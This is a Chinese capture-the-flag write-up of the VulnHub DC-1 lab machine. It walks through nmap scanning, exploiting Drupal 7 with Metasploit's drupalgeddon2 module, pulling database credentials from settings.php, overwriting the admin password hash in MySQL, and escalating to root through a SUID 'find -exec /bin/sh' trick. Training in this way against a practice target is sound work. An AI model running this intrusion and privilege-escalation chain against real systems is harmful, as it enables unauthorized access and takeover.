DC1靶机解析+思路
DC系列-——dc1靶机解析
确定IP:
首先切换网卡到nat模式,再用kali中的nmap工具扫描当前网段的主机,查看开放主机
指令:nmap -sS 网段
试一下,找dc1的ip
打开界面是这样,看到Drupal(一种CMF框架),再使用nmap扫描80端口综合信息查找版本
指令:nmap -A -p80 DC1的ip
扫描到drupal的版本是7,接下来可以用searchsploit查找对应的漏洞
发现有的有rb文件 (rb文件是导入到msfconsole工具中的漏洞模块),查看是否有关于drupal的漏洞可以使用,这里上网查了一下各位师傅们,说是用这个模块
exploit/unix/webapp/drupal_drupalgeddon2
使用模块,然后set rhosts ,直接run过去
set rhosts xxx.xxx.xxx.xxx
run
使用pty生成虚拟终端
python -c “import pty;pty.spawn(‘/bin/sh’)"
然后查看当前目录,发现flag1.txt,查看发现flag1.txt只是前戏
flag1是一个提示,说明需要查看cms的config文件,加下来就是找到config文件查看,获取下一条信息,百度找到配置文件的位置
sites/default/settings.php
路径
找到数据库密码,数据库密码应该是第二个flag,接下来就是去数据库找文件了
进入数据库,然后选择drupaldb查找发现users表,查看字段
desc users;
发现用户名和密码的字段,但是发现加密方式咱也看不懂,或许有本地加密文件,查看…
find / -name “*pass*”
果然有,文件路径 /var/www/scripts/password-hash.sh
,然后查找网上的使用方法
php password-hash.sh
密码,就会出现密码(在/var/www/html目录底下执行)
找到密码之后去mysql里面更新数据表
update users set pass="$S$DGNd1zikVA6n5iFua4HyRb5240su<s="$S$DGNd1zikVA6n5iFua4HyRb5240suDkmXJIua1nvHi6EiF <Rb5240suDkmXJIua1nvHi6EiFkCGnR7G" where name="admin ";
改完数据库之后登录,发现flag3
flag3提示exec 和 shell,接下来就是找flag4了
find / -name "flag4*"
查看flag4,提示我们需要找到在root目录下的flag
查看当前用户有哪些权限
find / -perm -u=s 2>/dev/null或者find / -perm -4000 2>/dev/null,发现find有root权限,再联想到之前flag3的exec,就可以用find提权
find提权:
首先创建文件
touch 123->find提权 find 123-exec ‘/bin/sh’ ;
获取到root权限之后查看root目录下的flag,发现finalflag,这就是最后的flag
DC1靶机解析+思路相关推荐
- vulnhub-DC系列通关记DC1靶机渗透
声明:此文章仅供参考学习,请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者无关. 目录 flag1 信息收集 漏洞利用 后渗透 flag2 flag3 flag4 最终flag ...
- 编程笔试(解析及代码实现):字符串反转(字符串逆序输出)代码实现十多种方法对比(解析思路及其耗费时间)详细攻略
编程笔试(解析及代码实现):字符串反转(字符串逆序输出)代码实现十多种方法对比(解析思路及其耗费时间)详细攻略 目录 字符串反转(字符串逆序输出)代码实现十多种方法对比(解析思路及其耗费时间)详细攻略 ...
- 基于TencentOS-tiny实现PM2.5传感器(攀藤PMSA003)数据解析思路及实现
说明:此文章提供了一种基于TencentOS-tiny的串口数据解析思路及实现,感谢戴大神最初写的源码,这种思路同样可以实现AT框架.基于串口的GPS数据解析等等. 1. PM2.5传感器 本文使用的 ...
- DC系列:1 (DC-1靶机,初级渗透详细教程)
DC-1靶机渗透 环境搭建 详情 描述 使用工具 一:信息收集 基础信息查询 0x01 查看存活主机 0x02 查看开放端口 0x03 查看端口服务 0x04 扫描网站根目录及指纹信息 0x05 访问 ...
- 渗透练习 DC-1靶机
导出的pdf下载即可 复现SLR大哥的DC-1 靶机 DC-1 安装 VM打开DC-1.ova[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Ql3Hejjo-16163 ...
- 渗透测试-靶机打靶思路与方法
渗透测试-靶机打靶思路与方法 文章目录 渗透测试-靶机打靶思路与方法 一.对靶机进行信息收集 1.首先对目标存活靶机发起嗅探: 2.对目标主机开放端口及服务发起探测 3.对非web端口的服务发起迅速的 ...
- 拼团模式为什么会这么火?最完整的解析思路
拼团模式为什么会这么火?最完整的解析思路 背景:2021年05月07日,腾讯[王者荣耀]拼团活动的上线,打破传统的拼团.囤货模式,将虚拟产品嵌入到拼团模式中,新的一波拼团浪潮来临? [王者荣耀]活动规 ...
- 记录一下 DC1靶机渗透
一.准备 首先kaili攻击机和DC1靶机都是桥接网络,为了nmap扫描(桥接网络在设置里). 二.namp扫描 1.首先扫描一下这个网段 很容易可以看见DC1的靶机的ip地址192.168.1.10 ...
- vulnhub之DC1靶机
靶机概览 信息收集 nmap信息收集 网站信息收集 使用nikto来收集一下 渗透攻击 getshell Flag1 Flag2 进入数据库 拿下数据库的root账号 登录网站 Flag3 Flag4 ...
最新文章
- DTS增量/同步支持DDL迁移的说明
- OpenGL学习笔记(2) 画一个正方形
- C# Winform只能输入数字的TextBox---补充
- 将log4cplus.so集成到linux下报undefined reference to 错误
- wxpython的sizer_wxPython BoxSizer布局
- python爬虫本科容易找工作吗_python爬虫基础学完了,我真的能找到一份工作吗?...
- cydia 未能连接服务器,iOS 越狱全过程,解决cydia或sileo无法联网问题
- win10系统恢复win7的照片查看器
- Android Activity 的详细启动过程分析
- 基于CC2430的Zigbee开发套件【转】
- ASP.net的简单认识
- Discuz大气游戏风格模板/仿lol英雄联盟游戏DZ游戏模板GBK
- Failed to start LSB: Bring up/down错误解决方法
- 如果我们能正确测本因子
- 每日新闻:麦肯锡:未来10年 人工智能为全球GDP贡献1.2%增长;工信部下发第19批CDN、云服务牌照...
- ElasticSearch健康检查localhost:9200 not reachable
- 指法练习软件需求说明书
- CRM系统慢慢转为企业微信SCRM
- 回炉重造七---磁盘存储和文件系统
- winsty: 我的PhD总结
热门文章
- 信息安全保障人员CISAW认证基础级、专业级通用认证条件
- 触摸按键控制 LED 灯实验
- 数独(sudoku)游戏的程序求解
- 当双十一的广告强行闯入生活
- CVPR2022《NFormer: Robust Person Re-identification with Neighbor Transformer》
- django html5模板,Django模板系统(非常详细)
- vue 下拉刷新 组件 伸手党福利
- 批量修改文件名且去掉括号操作
- cma检测认证机构推荐 检测机构的分类
- C语言课程设计个人所得税计算,请个高手帮忙设计个C语言个人所得税计算的程序...